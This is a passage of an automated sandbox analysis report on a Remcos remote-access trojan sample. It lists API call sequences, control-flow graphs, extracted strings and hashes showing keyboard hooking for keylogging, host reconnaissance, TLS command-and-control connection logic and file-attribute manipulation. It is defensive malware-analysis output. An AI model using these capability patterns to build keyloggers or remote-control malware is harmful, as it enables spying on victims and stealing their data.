                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NssBkEQKsI.exe,00000104), ref: 0040D790
                                                    • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\NssBkEQKsI.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-MKYDDH$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                  • API String ID: 2830904901-1430711807
                                                  • Opcode ID: b338a7daa195b1c01a59b512861c6fab6f0ad61c996b4e4dc3262e5aaeb11736
                                                  • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                  • Opcode Fuzzy Hash: b338a7daa195b1c01a59b512861c6fab6f0ad61c996b4e4dc3262e5aaeb11736
                                                  • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1276 4099e4-4099fd 1277 409a63-409a73 GetMessageA 1276->1277 1278 4099ff-409a19 SetWindowsHookExA 1276->1278 1279 409a75-409a8d TranslateMessage DispatchMessageA 1277->1279 1280 409a8f 1277->1280 1278->1277 1283 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1278->1283 1279->1277 1279->1280 1281 409a91-409a96 1280->1281 1283->1281
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                  • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                  • GetLastError.KERNEL32 ref: 00409A1B
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                  • TranslateMessage.USER32(?), ref: 00409A7A
                                                  • DispatchMessageA.USER32(?), ref: 00409A85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error $`Mw
                                                  • API String ID: 3219506041-1277971878
                                                  • Opcode ID: b25c238cc25c38f6a39b157eec7e909f885e780430bb9e72e24c2f6a8841eb99
                                                  • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                  • Opcode Fuzzy Hash: b25c238cc25c38f6a39b157eec7e909f885e780430bb9e72e24c2f6a8841eb99
                                                  • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                    • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                  • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                  • API String ID: 2281282204-3981147832
                                                  • Opcode ID: 5e3dc2ee62b3815afed8a14a75d9f4affef8716378befb7542775b3a197d221c
                                                  • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                  • Opcode Fuzzy Hash: 5e3dc2ee62b3815afed8a14a75d9f4affef8716378befb7542775b3a197d221c
                                                  • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1419 404915-404924 1420 4049b1 1419->1420 1421 40492a-404931 1419->1421 1422 4049b3-4049b7 1420->1422 1423 404933-404937 1421->1423 1424 404939-404940 1421->1424 1425 404987-4049af CreateEventA CreateThread 1423->1425 1424->1425 1426 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1424->1426 1425->1422 1426->1425
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00404946
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 35453c4289c9b9740e7d5fc02d345a9090b78ad88d17a20c74762e0b12e92854
                                                  • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                  • Opcode Fuzzy Hash: 35453c4289c9b9740e7d5fc02d345a9090b78ad88d17a20c74762e0b12e92854
                                                  • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                  • SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                  • recv.WS2_32(?,?,?,00000000), ref: 0040459F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventObjectSingleWaitrecv
                                                  • String ID:
                                                  • API String ID: 311754179-0
                                                  • Opcode ID: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
                                                  • Instruction ID: 26c9fa113e50de76ad78d978a7fe27ea9b76c3f20528cd6e12f8aa4c3c3b2b63
                                                  • Opcode Fuzzy Hash: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
                                                  • Instruction Fuzzy Hash: 3FF08236108212BFD7018B14FC08E1AFBA2FB88721F10863AF614522A19771EC20DB59
                                                  APIs
                                                  • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                  • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Name$ComputerUser
                                                  • String ID:
                                                  • API String ID: 4229901323-0
                                                  • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                  • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                  • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                  • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                  APIs
                                                  • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                                                  • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                  • Opcode Fuzzy Hash: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                                                  • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 582 414b54-414b66 call 4047eb call 4020b4 559->582 565 4142ca-4142df call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a686 560->566 581 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 565->581 565->582 566->582 647 414434-414441 call 40541d 581->647 648 414446-41446d call 401e8f call 412513 581->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 582->596 597 414b8e-414b96 call 401d8c 582->597 596->597 597->476 647->648 654 414474-414abb call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 900 414ac0-414ac7 654->900 655->654 901 414ac9-414ad0 900->901 902 414adb-414ae2 900->902 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->582
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                  • WSAGetLastError.WS2_32 ref: 00414249
                                                  • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$ErrorLastLocalTime
                                                  • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\NssBkEQKsI.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-MKYDDH$TLS Off$TLS On $TUF$XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                  • API String ID: 524882891-3215847970
                                                  • Opcode ID: 42ec603880386e9b3517247c65dec39d4b964e087a5ceb7d1aae457de9e7f40c
                                                  • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                  • Opcode Fuzzy Hash: 42ec603880386e9b3517247c65dec39d4b964e087a5ceb7d1aae457de9e7f40c
                                                  • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNELBASE(00001388), ref: 00409E62
                                                    • Part of subcall function 00409D97: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                    • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                    • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                    • Part of subcall function 00409D97: CloseHandle.KERNELBASE(00000000,?,?,?,00409E6F), ref: 00409E10
                                                  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00409E9E
                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 00409EAF
                                                  • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 00409EC6
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                  • API String ID: 3795512280-3163867910
                                                  • Opcode ID: 478d1cbae2b352f7a85ddd3b94cb29f0f84926477ce6454f32d463d399d219e0
                                                  • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                  • Opcode Fuzzy Hash: 478d1cbae2b352f7a85ddd3b94cb29f0f84926477ce6454f32d463d399d219e0
                                                  • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1022 40428c-4042ad connect 1023 4043e1-4043e5 1022->1023 1024 4042b3-4042b6 1022->1024 1027 4043e7-4043f5 WSAGetLastError 1023->1027 1028 40445f 1023->1028 1025 4043da-4043dc 1024->1025 1026 4042bc-4042bf 1024->1026 1029 404461-404465 1025->1029 1030 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1026->1030 1031 4042eb-4042f5 call 420151 1026->1031 1027->1028 1032 4043f7-4043fa 1027->1032 1028->1029 1030->1031 1041 404306-404313 call 420373 1031->1041 1042 4042f7-404301 1031->1042 1034 404439-40443e 1032->1034 1035 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1032->1035 1038 404443-40445c call 401f66 * 2 call 41a686 1034->1038 1035->1028 1038->1028 1054 404315-404338 call 401f66 * 2 call 41a686 1041->1054 1055 40434c-404357 call 420f34 1041->1055 1042->1038 1084 40433b-404347 call 420191 1054->1084 1067 404389-404396 call 4202ea 1055->1067 1068 404359-404387 call 401f66 * 2 call 41a686 call 420592 1055->1068 1081 404398-4043bb call 401f66 * 2 call 41a686 1067->1081 1082 4043be-4043d7 CreateEventW * 2 1067->1082 1068->1084 1081->1082 1082->1025 1084->1028
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 004042A5
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                  • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: da33fcb12fc8fa225914991ff724b524bff1c68ebbc9632bded2e3fb966eaf16
                                                  • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                  • Opcode Fuzzy Hash: da33fcb12fc8fa225914991ff724b524bff1c68ebbc9632bded2e3fb966eaf16
                                                  • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                  Control-flow Graph

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                  • CloseHandle.KERNELBASE(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                  • closesocket.WS2_32(000000FF), ref: 0040481F
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
